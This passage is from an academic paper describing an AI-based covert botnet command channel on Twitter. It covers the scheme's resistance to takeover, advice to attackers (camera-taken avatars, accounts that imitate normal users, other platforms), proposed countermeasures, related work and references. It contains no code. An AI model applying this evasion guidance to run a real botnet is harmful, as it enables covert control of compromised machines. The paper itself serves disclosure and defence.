Even though, we still tried a collision for avatars. We made more than 0.6 billion calculations on the distances between pairs of the crawled 115, 887 avatars. There are 2050 pairs that have a distance below the 0.02 (0.00031%), of which 81 pairs below 0.01 (0.000012%). By analyzing these pictures, we found they share the same style that they all have a large solid color background, especially white background (mainly logos) (see Fig. 12). As avatars are prepared by attackers, they can avoid this type of pictures. It is also recommended that attackers use colorful pictures taken by their cameras instead of pictures from Internet.

V-C5 Attack the Model

Adversaries can attack the neural network model to let bots make wrong decisions on botmaster’s accounts. This is possible as there are some works on neural networks trojan attacks [16]. It may affect one bot but do not influence the whole botnet. Other unaffected bots can still make right decisions on botmaster’s accounts.

V-C6 Generate Adversarial Samples

As the model and feature vectors are known to adversaries, it is a white-box non-targeted adversarial attack in this scenario. Adversaries can generate an adversarial sample to fool the model and bots. Adversarial attacks aim at a misclassification on original target, but it is not a classification task in this scenario. Although there are 128 outputs of CNN, there are no 128 classes of targets. A slightly perturbation on feature vector will result in a distance higher than threshold. Therefore, it is also hard to attack the botnet.

Even through adversaries happened to get an image that produce a similar vector, the size of botnet can be seized, but botnet cannot be taken over, as there are authentications between botmaster and bots on the C&C server (like [26]). A cryptography authentication is mandatory to ensure the security of C&C communication. All connections, commands and payloads between bots and C&C server are protected by advanced symmetric keys and asymmetric key pairs. This is impossible to break with the current computing capacity.

Vi Discussion and Related Works

Vi-a Discussion

Vi-A1 Options for Attackers

As a proof of concept, parameters in this work are conservative. In fact, to enhance security, the length of vectors can be longer than 128. It will make the collision for avatars even more difficult. Also, threshold for distances of avatars and vectors can be lower than 0.02, as the undistributed avatars and the distances are within the authority of attackers and can be customized by attackers.

As shown in Table III and discussions above, other fields in OSN can also be used to convey customized contents to others. The openness of OSNs provide convenience for normal users but can also be utilized by malicious users. For instance, attackers could post anything on a trend, or comment anything on a tweet, and bots would identify botmaster by its avatar and get commands from the profiles of botmaster. Other platforms like Weibo, Tumblr are also capable of command and control in this way.

To reduce the abnormal behaviors of botmaster’s accounts, attackers could maintain the accounts by imitating normal users. They can post tweets and retweet, comment and “like” any other tweets everyday. This can be done manually or automatically. When attackers need to publish a command, attackers can select one account and maintain other accounts as usual.

Vi-A2 Possible Countermeasures

As many fields in OSNs could be utilized, OSNs should take responsibilities to mitigate this attack. One possible method is to limit the contents that can be viewed anonymously. When OSNs are visited by unauthenticated users, not all contents in the OSNs are available. In this way, normal users can also browse anything they like, while bots may not retrieve the tweets posted by botmaster. This maintains openness and improves security on OSNs. Also, contents from unverified users can be retrieved with a probability according to their behavioral credibility. Higher credits can be assigned to normal users, while for abnormal or suspicious users, lower credits can be assigned. As different OSNs have different principles and policies on their contents, they can develop a suitable method for their platform to mitigate this attack.

As avatars and accounts are used only once when publishing commands, attackers need to prepare some Twitter accounts for botmasters. During the works on this paper, we found some websites that sell Twitter accounts in bulk. We cannot predict how the buyers use those accounts. Since it violates Twitter ToS, relevant parties should limit illegal accounts transactions so that botmasters may not get enough accounts to publish more commands. Also, OSNs could upgrade their risk control on suspicious accounts and help their users to promote accounts security level.

Traditional malware detection methods such as behavior analysis can also be applied in this case. There are some periodical behaviors of bots. According to the rules set by attackers, bots need to visit Twitter Trends periodically. After the selection of a trending topic, bots need to crawl tweets to find botmaster. When identifying botmaster, bots also need to crawl avatars from Twitter. These series of operations can form a behavioral patten of bots. Therefore, in this way, botnet activities can be detected.

As AI can be used to launch cyber attacks, security vendors should also take the malicious use of AI into consideration so that the attacks can be detected when they are applied in real scenarios in the future.

Vi-B Related Works

This work provides a new perspective on malicious use of AI. There are many works that discuss the combination of AI and attacks. In 2017, MalGAN [13] was proposed to generate adversarial malware examples that were able to bypass black-box machine learning based detection models. A generative network is trained to minimize the generated adversarial examples’ malicious probabilities predicted by black-box malware detector.

In 2018, DeepLocker [4] was proposed by researchers from IBM to carry out targeted attacks in a stealthy way. DeepLocker trains the target attributes and a secret key together into an AI model, embeds the AI model and encrypted malicious code into benign applications. Target detection is conducted by the AI model that when input attributes match target attributes, the secret key will be derived from the AI model to decrypt the payload and launch attacks on the target; if not match, the intent of the malicious code are concealed as no decryption key is available.

Rigaki [19] proposed to use GAN to mimic Facebook chat traffic to make C&C communication undetectable. In both their work and our work, AI is used to build a covert communication. They use GAN to mimic OSNs traffic because it is harder to detect. While in our work there is no need to mimic OSNs traffic, as all traffic here is from real OSNs.

Vii Conclusion

In this paper, we discussed a novel covert command and control on OSNs by introducing AI technologies. By utilizing the poor explainability of neural network models, ways to find botmaster (addressing) can be concealed in the AI models and are resistant to forensic analysis. For issuing commands covertly, we use easy data augmentation and hash collision to generate contextual and readable command-embeded tweets to avoid abnormal contents on OSNs. Experiments on Twitter shows that this method is feasible and efficient.

This paper shows that AI is also capable of cyber attacks. With the popularity of AI, AI-powered cyber attacks will emerge and bring new challenges for cyber security. Cyber attack and defense are interdependent. We believe countermeasures against AI attacks will be applied in future computer systems, and protection for computer systems will be more intelligent. We hope the proposed scenario will contribute to future protection efforts.

References

  • [1] M. Bailey, E. Cooke, F. Jahanian, Y. Xu, and M. Karir. 2009. “A Survey of Botnet Technology and Defenses,” In 2009 Cybersecurity Applications Technology Conference for Homeland Security. 299–304.
  • [2] Jane Bromley, James W. Bentz, Léon Bottou, Isabelle Guyon, Yann Lecun, Cliff Moore, Eduard Säckinger, and Roopak Shah. [n.d.]. “Signature Verification Using A “Siamese” Time Delay Neural Network,” 25–44.
  • [3] Antoine de Saint-Exupéry. 2019. “El Principito: The Little Prince,” Editorial Verbum.
  • [4] Dhilung Kirat, Jiyong Jang and Marc Ph. Stoecklin. 2018. “DeepLocker - Concealing Targeted Attacks with AI Locksmithing,” Technical Report. IBM Research.
  • [5] F-Secure. 2015. “The Dukes: 7 Years of Russian Cyberespionage,” Technical Report. F-Secure.
  • [6] Robert Falcone and Bryan Lee. 2019. “DarkHydrus delivers new Trojan that can use Google Drive for C2 communications,” Retrieved June 2, 2020 from https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-thatcan-use-google-drive-for-c2-communications/
  • [7] Matthieu Faou. 2020. “From Agent.Btz to Comrat V4: A ten-year journey,” Technical Report. ESET.
  • [8] FireEye. 2015. “Uncovering a Malware Backdoor that Uses Twitter,” Technical Report. FireEye.
  • [9] Freddy Lecue, Krishna Gade, Sahin Cem Geyik, Krishnaram Kenthapadi, Varun Mithal, Ankur Taly, Riccardo Guidotti and Pasquale Minervini. 2020. “Explainable AI: Foundations, Industrial Applications, Practical Challenges, and Lessons Learned,” Retrieved June 2, 2020 from https://xaitutorial2020.github.io/
  • [10] Group-IB. 2017. “Lazarus Arisen: Architecture, Techniques and Attribution,” Technical Report. Group-IB.
  • [11] Josh Grunzweig. 2018. “Comnie Continues to Target Organizations in East Asia,” Retrieved June 2, 2020 from https://unit42.paloaltonetworks.com/unit42-comniecontinues-target-organizations-east-asia/
  • [12]

    R. Hadsell, S. Chopra, and Y. LeCun. 2006. “Dimensionality Reduction by Learning an Invariant Mapping,” In 2006 IEEE Computer Society Conference on Computer Vision and Pattern Recognition (CVPR’06), Vol. 2. 1735–1742.

  • [13] Weiwei Hu and Ying Tan. 2017. “Generating Adversarial Malware Examples for Black-Box Attacks Based on GAN,” CoRR abs/1702.05983 (2017).
  • [14] Tom Lancaster and Esmid Idrizovic. 2017. “Paranoid PlugX,” Retrieved June 2, 2020 from https://unit42.paloaltonetworks.com/unit42-paranoid-plugx
  • [15] Y. LeCun, B. Boser, J. S. Denker, D. Henderson, R. E. Howard,W. Hubbard, and L. D. Jackel. 1989. “Backpropagation Applied to Handwritten Zip Code Recognition,” Neural Computation 1, 4 (1989), 541–551.
  • [16] Yingqi Liu, Shiqing Ma, Yousra Aafer, Wen-Chuan Lee, Juan Zhai,Weihang Wang, and Xiangyu Zhang. 2018. “Trojaning Attack on Neural Networks,” In 25th Annual Network and Distributed System Security Symposium, NDSS 2018, San Diego, California, USA, February 18-21, 2018.
  • [17] Angela Moscaritolo. 2009. “Twitter used as botnet command-and-control hub,” Retrieved June 2, 2020 from https://www.itnews.com.au/news/twitter-used-asbotnet-command-and-control-hub-153144
  • [18] Nick Pantic and Mohammad I. Husain. 2015. “Covert Botnet Command and Control Using Twitter,” In Proceedings ofthe 31st Annual Computer Security Applications Conference (Los Angeles, CA, USA) (ACSAC2015). Association for Computing Machinery, New York, NY, USA, 171–180.
  • [19] Maria Rigaki and Sebastian Garcia. 2018. “Bringing a GAN to a Knife-Fight: Adapting Malware Communication to Avoid Detection,” In 2018 IEEE Security and PrivacyWorkshops, SPWorkshops 2018, San Francisco, CA, USA, May 24, 2018. IEEE Computer Society, 70–75.
  • [20] Sanjeev Jagannatha Rao, Yufei Wang and Garrison Cottrell. 2016. “A Deep Siamese Neural Network Learns the Human-Perceived Similarity Structure of Facial Expressions Without Explicit Categories,” In Proceedings ofthe 38th Annual Conference of the Cognitive Science Society, Grodner D. Mirman D. Trueswell J.C. Papafragou, A. (Ed.). Cognitive Science Society, Cognitive Science Society, 217– 222.
  • [21] S. Sebastian, S. Ayyappan, and V. P. 2014. “Framework for design of Graybot in social network,” In 2014 International Conference on Advances in Computing, Communications and Informatics (ICACCI). 2331–2336.
  • [22] Ashutosh Singh. 2012. “Social networking for botnet command and control,” (2012).
  • [23] Lukas Stefanko. 2018. “New Telegram-abusing Android RAT discovered in the wild,” Retrieved June 1, 2020 from https://www.welivesecurity.com/2018/06/18/newtelegram-abusing-android-rat/
  • [24] Twitter. 2020. “Twitter Terms of Service,” Retrieved June 1, 2020 from https: //twitter.com/en/tos
  • [25] Twitter. 2020. “API reference index,” Retrieved Sept. 16, 2020 from https://developer.twitter.com/en/docs/api-reference-index
  • [26] P. Wang, S. Sparks, and C. C. Zou. 2010. “An Advanced Hybrid Peer-to-Peer Botnet,” IEEE Transactions on Dependable and Secure Computing 7, 2 (2010), 113–127.
  • [27] Warren Mercer, Paul Rascagneres and Matthew Molyett. 2017. “Introducing ROKRAT,” Retrieved June 2, 2020 from https://blog.talosintelligence.com/2017/04/introducing-rokrat.html
  • [28] Jason W. Wei and Kai Zou. 2019. “EDA: Easy Data Augmentation Techniques for Boosting Performance on Text Classification Tasks,” CoRR abs/1901.11196 (2019).
  • [29] Jie Yin, Heyang Lv, Fangjiao Zhang, Zhihong Tian, and Xiang Cui. 2018. “Study on Advanced Botnet Based on Publicly Available Resources,” In Information and Communications Security. Springer International Publishing, Cham, 57–74.